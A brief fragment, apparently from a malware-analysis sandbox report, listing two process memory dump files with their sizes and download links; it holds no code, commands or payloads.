memory/5968-8-0x0000000074C10000-0x00000000753C1000-memory.dmp

Filesize
7.7MB

Download
memory/5968-7-0x0000000004D30000-0x0000000004D66000-memory.dmp

Filesize
216KB

Download